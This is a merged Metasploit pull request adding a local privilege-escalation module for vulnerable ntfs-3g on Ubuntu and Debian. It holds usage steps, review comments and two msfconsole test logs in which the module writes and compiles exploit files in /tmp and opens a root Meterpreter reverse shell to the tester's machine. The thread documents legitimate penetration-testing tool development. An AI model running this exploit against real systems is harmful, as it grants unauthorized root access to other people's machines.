### PR TITLE
ntfs-3g local privilege escalation

### PR DESCRIPTION
**Pull request by h00die**
Adds a LPE for ntfs-3g on debian and ubuntu, originally discovered by Google project zero team.  See docs for more info

**If you are using a VM, use 2 cores!!!** that was in the original writeup, and my 16.10 and debian boxes both failed until i added the 2nd core. Also debian needs kernel-headers installed, but thats all in the module docs.

Verification steps
- [x] 1. Start msfconsole
- [x] 2. Exploit a box via whatever method
- [x] 4. Do: `use exploit/linux/local/ntfs3_priv_esc`
- [x] 5. Do: `set session #`
- [x] 6. Do: `set verbose true`
- [x] 7. Do: `exploit`
- [x] 8. enjoy root

### CODE REVIEW

File: documentation/modules/exploit/linux/local/ntfs3g_priv_esc.md [hunk 1]
```diff
@@ -0,0 +1,264 @@
...
+
+  We have to live compile on the host, so `make` and `gcc` are required.  Easiest thing to do is: `apt-get install build-essential`.
+  
+  As per notes from the original EDB module, if you're in a VM, you should use **at least two CPU cores**.  This was confirmed during testing of this module as well.
+
+This module has been tested against:
+
+  1. Ubuntu 16.04 with ntfs-3g 1:2015.3.14AR.1-1build1
+  2. Ubuntu 16.10 with ntfs-3g 1:2016.2.22AR.1-3
+  3. Debian Jesse 8 (8.7.1, had to downgrade ntfs-3g to vuln version, and install kernel headers): `apt-get install ntfs-3g=1:2014.2.15AR.2-1+deb8u2 linux-headers-$(uname -r)`
```
Comment (jvoisin) [inline documentation/modules/exploit/linux/local/ntfs3g_priv_esc.md]: Debian Jess**i**e ;)

File: modules/exploits/linux/local/ntfs3g_priv_esc.rb [hunk 2]
```diff
@@ -0,0 +1,469 @@
...
+          return true
+        else
+          print_error('Linux kernel headers not available, compiling will fail.')
+          return false
+        end
+      end
+      false
+    end
+
+    output = cmd_exec('dpkg -l | grep \'^ii\' | grep ntfs-3g')
```
Comment (jvoisin) [inline modules/exploits/linux/local/ntfs3g_priv_esc.rb]: `dpkg -l` supports patterns, it's possible to use `dpkg -l ntfs-3g | grep '^ii'` instead.

Comment (h00die) [inline modules/exploits/linux/local/ntfs3g_priv_esc.rb]: learn something new everyday!  Good find, thanks.

File: documentation/modules/exploit/linux/local/ntfs3g_priv_esc.md (hunk 1 above)
Comment (h00die) [inline documentation/modules/exploit/linux/local/ntfs3g_priv_esc.md]: good catch

**Comment by bwatters-r7** [comment]
It looked ugly there at first with all the modprobe errors, but it did succeed....
I am going to ask around a little bit about the ramifications to landing this with the printf CI errors before I go further.  Travis is a fickle beast and I do not want to get on his bad side.

## Testing
### Target Info
```
brendan@ubuntu:~$ uname -a
Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
brendan@ubuntu:~$ apt-cache policy ntfs-3g
ntfs-3g:
  Installed: 1:2015.3.14AR.1-1build1
```
### msfconsole output:

```
msf exploit(handler) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set username brendan
username => brendan
msf auxiliary(ssh_login) > set password <password>
password => <password>
msf auxiliary(ssh_login) > set rhosts <ubuntu_16.04_IP>
rhosts => <ubuntu_16.04_IP>
msf auxiliary(ssh_login) > run

[*] SSH - Starting bruteforce
[-] SSH - Could not connect: The connection was refused by the remote host (<ubuntu_16.04_IP>:22).
[!] No active DB -- Credential data will not be saved!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > run

[*] SSH - Starting bruteforce
[+] SSH - Success: 'brendan:<password>' 'uid=1000(brendan) gid=1000(brendan) groups=1000(brendan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (<MSF_IP>:45128 -> <ubuntu_16.04_IP>:22) at 2017-03-24 10:14:37 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions -l

Active sessions
===============

  Id  Type          Information                                 Connection
  --  ----          -----------                                 ----------
  1   shell /linux  SSH brendan:<password> (<ubuntu_16.04_IP>:22)  <MSF_IP>:45128 -> <ubuntu_16.04_IP>:22 (<ubuntu_16.04_IP>)

msf auxiliary(ssh_login) > sessions -i 1
[*] Starting interaction with 1...

whoami
brendan
^Z
Background session 1? [y/N]  y
msf auxiliary(ssh_login) > use exploit/linux/local/ntfs3g_priv_esc 
msf exploit(ntfs3g_priv_esc) > set session 1
session => 1
msf exploit(ntfs3g_priv_esc) > set verbose true
verbose => true
msf exploit(ntfs3g_priv_esc) > set lhost <MSF_IP>
lhost => <MSF_IP>
msf exploit(ntfs3g_priv_esc) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on <MSF_IP>:4444 
[+] Vulnerable Ubuntu 16.04 detected
[+] make is installed
[+] gcc is installed
[*] Live compiling exploit on system
[*] Writing files to target
[*] Writing rootshell to /tmp/rootshell.c
[*] Max line length is 65537
[*] Writing 339 bytes in 1 chunks of 1180 bytes (octal-encoded), using printf
[*] Writing sploit to /tmp/sploit.c
[*] Max line length is 65537
[*] Writing 7560 bytes in 1 chunks of 26750 bytes (octal-encoded), using printf
[*] Writing rootmod to /tmp/rootmod.c
[*] Max line length is 65537
[*] Writing 1073 bytes in 1 chunks of 3890 bytes (octal-encoded), using printf
[*] Writing Makefile to /tmp/Makefile
[*] Max line length is 65537
[*] Writing 18 bytes in 1 chunks of 66 bytes (octal-encoded), using printf
[*] Writing payload to /tmp/HgFptmNT
[*] Max line length is 65537
[*] Writing 206 bytes in 1 chunks of 568 bytes (octal-encoded), using printf
[*] Starting execution of priv esc.
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (2440248 bytes) to <ubuntu_16.04_IP>
[-] Failed to open /proc/filesystems: Too many open files in system
looks like we won the race
got ENFILE at 88680 total
yay, modprobe ran!
modprobe: ERROR: ../libkmod/libkmod.c:514 lookup_builtin_file() could not open builtin file '/tmp/ntfs_sploit.IYspJj/lib/modules/4.4.0-62-generic/modules.builtin.bin'
modprobe: ERROR: could not insert 'rootmod': Too many levels of symbolic links
Error opening '/tmp/ntfs_sploit.IYspJj/volume': Is a directory
Failed to mount '/tmp/ntfs_sploit.IYspJj/volume': Is a directory
we have root privs now...
[*] Meterpreter session 2 opened (<MSF_IP>:4444 -> <ubuntu_16.04_IP>:46462) at 2017-03-24 11:07:26 -0500
[!] This exploit may require manual cleanup of '/tmp/rootshell.c' on the target
[!] This exploit may require manual cleanup of '/tmp/rootshell' on the target
[!] This exploit may require manual cleanup of '/tmp/sploit.c' on the target
[!] This exploit may require manual cleanup of '/tmp/sploit' on the target
[!] This exploit may require manual cleanup of '/tmp/rootmod.c' on the target
[!] This exploit may require manual cleanup of '/tmp/Makefile' on the target
[!] This exploit may require manual cleanup of '/tmp/HgFptmNT' on the target
[!] This exploit may require manual cleanup of '/tmp/rootmod.ko' on the target
[!] This exploit may require manual cleanup of '/tmp/rootmod.mod.c' on the target
[!] This exploit may require manual cleanup of '/tmp/rootmod.mod.o' on the target
[!] This exploit may require manual cleanup of '/tmp/rootmod.o' on the target

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : <ubuntu_16.04_IP>
OS           : Ubuntu 16.04 (Linux 4.4.0-62-generic)
Architecture : x64
Meterpreter  : x64/linux
meterpreter > 
```

File: modules/exploits/linux/local/ntfs3g_priv_esc.rb [hunk 3]
```diff
@@ -0,0 +1,469 @@
...
+      else
+        vprint_status("Writing #{filename} to #{file_path}")
+        write_file(file_path, file_content)
+      end
+      cmd_exec("chmod +x #{file_path}");
+      register_file_for_cleanup(file_path)
+    end
+
+    # These are direct copies of the modules from EDB
+    rootmod = %q{
```
Comment (wvu-r7) [inline modules/exploits/linux/local/ntfs3g_priv_esc.rb]: I wonder why you don't put your source in `external/source/exploits`.

Comment (wvu-r7) [inline modules/exploits/linux/local/ntfs3g_priv_esc.rb]: That would, at the very least, avoid killing `msftidy` and consequently Travis. I also think it's the right thing to do when you have any significant length of external source. It doesn't belong in the module.

Comment (h00die) [inline modules/exploits/linux/local/ntfs3g_priv_esc.rb]: Mainly because no ones ever mentioned doing that before!

**Comment by h00die** [comment]
@bwatters-r7 the `modprobe` and actual executable output only prints in msf if verbose is true, or a session isn't obtained.  Should help keep that out of the console when not needed.

**Comment by h00die** [comment]
updated, i moved the code to `data/exploits` since thats mapped in `Msf::Config.data_directory`

**Comment by bwatters-r7** [comment]
# Re-Test

```
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set username brendan
username => brendan
msf auxiliary(ssh_login) > set password <password>
password => <password>
msf auxiliary(ssh_login) > set rhosts <ubuntu_16.04_IP>
rhosts => <ubuntu_16.04_IP>
msf auxiliary(ssh_login) > run

[*] SSH - Starting bruteforce
[+] SSH - Success: 'brendan:<password>' 'uid=1000(brendan) gid=1000(brendan) groups=1000(brendan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (<MSF_IP>:46269 -> <ubuntu_16.04_IP>:22) at 2017-04-04 09:41:26 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions -l

Active sessions
===============

  Id  Type          Information                                 Connection
  --  ----          -----------                                 ----------
  1   shell /linux  SSH brendan:<password> (<ubuntu_16.04_IP>:22)  <MSF_IP>:46269 -> <ubuntu_16.04_IP>:22 (<ubuntu_16.04_IP>)

msf auxiliary(ssh_login) > sessions -i 1
[*] Starting interaction with 1...

whoami
brendan
id
uid=1000(brendan) gid=1000(brendan) groups=1000(brendan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
^Z
Background session 1? [y/N]  y
msf auxiliary(ssh_login) > use exploit/linux/local/ntfs3g_priv_esc
msf exploit(ntfs3g_priv_esc) > set session 1
session => 1
msf exploit(ntfs3g_priv_esc) > set verbose true
verbose => true
msf exploit(ntfs3g_priv_esc) > set lhost <MSF_IP>
lhost => <MSF_IP>
msf exploit(ntfs3g_priv_esc) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on <MSF_IP>:4444 
[+] Vulnerable Ubuntu 16.04 detected
[+] make is installed
[+] gcc is installed
[*] Live compiling exploit on system
[*] Writing files to target
[*] Writing rootshell to /tmp/rootshell.c
[*] Max line length is 65537
[*] Writing 339 bytes in 1 chunks of 1180 bytes (octal-encoded), using printf
[*] Writing sploit to /tmp/sploit.c
[*] Max line length is 65537
[*] Writing 6451 bytes in 1 chunks of 23423 bytes (octal-encoded), using printf
[*] Writing rootmod to /tmp/rootmod.c
[*] Max line length is 65537
[*] Writing 1073 bytes in 1 chunks of 3890 bytes (octal-encoded), using printf
[*] Writing Makefile to /tmp/Makefile
[*] Max line length is 65537
[*] Writing 18 bytes in 1 chunks of 66 bytes (octal-encoded), using printf
[*] Writing payload to /tmp/nQnUdEvq
[*] Max line length is 65537
[*] Writing 206 bytes in 1 chunks of 568 bytes (octal-encoded), using printf
[*] Starting execution of priv esc.
[-] Failed to open /proc/filesystems: Too many open files in system
looks like we won the race
got ENFILE at 88753 total
yay, modprobe ran!
modprobe: ERROR: ../libkmod/libkmod.c:514 lookup_builtin_file() could not open builtin file '/tmp/ntfs_sploit.qZTPsx/lib/modules/4.4.0-62-generic/modules.builtin.bin'
modprobe: ERROR: could not insert 'rootmod': Too many levels of symbolic links
Error opening '/tmp/ntfs_sploit.qZTPsx/volume': Is a directory
Failed to mount '/tmp/ntfs_sploit.qZTPsx/volume': Is a directory
we have root privs now...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (2440248 bytes) to <ubuntu_16.04_IP>
[*] Meterpreter session 2 opened (<MSF_IP>:4444 -> <ubuntu_16.04_IP>:36936) at 2017-04-04 09:44:03 -0500
[!] This exploit may require manual cleanup of '/tmp/rootshell.c' on the target
[!] This exploit may require manual cleanup of '/tmp/rootshell' on the target
[!] This exploit may require manual cleanup of '/tmp/sploit.c' on the target
[!] This exploit may require manual cleanup of '/tmp/sploit' on the target
[!] This exploit may require manual cleanup of '/tmp/rootmod.c' on the target
[!] This exploit may require manual cleanup of '/tmp/Makefile' on the target
[!] This exploit may require manual cleanup of '/tmp/nQnUdEvq' on the target
[!] This exploit may require manual cleanup of '/tmp/rootmod.ko' on the target
[!] This exploit may require manual cleanup of '/tmp/rootmod.mod.c' on the target
[!] This exploit may require manual cleanup of '/tmp/rootmod.mod.o' on the target
[!] This exploit may require manual cleanup of '/tmp/rootmod.o' on the target

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : <ubuntu_16.04_IP>
OS           : Ubuntu 16.04 (Linux 4.4.0-62-generic)
Architecture : x64
Meterpreter  : x64/linux
```

**Comment by bwatters-r7** [comment]
# Release Notes
This module adds a local privilege escalation on debian machines with the following conditions:
1) At lease 2 cores
2) `make` installed
3) `gcc` installed
4) The vulnerable version of ntfs-3g (see documentation)

**Pull request merged**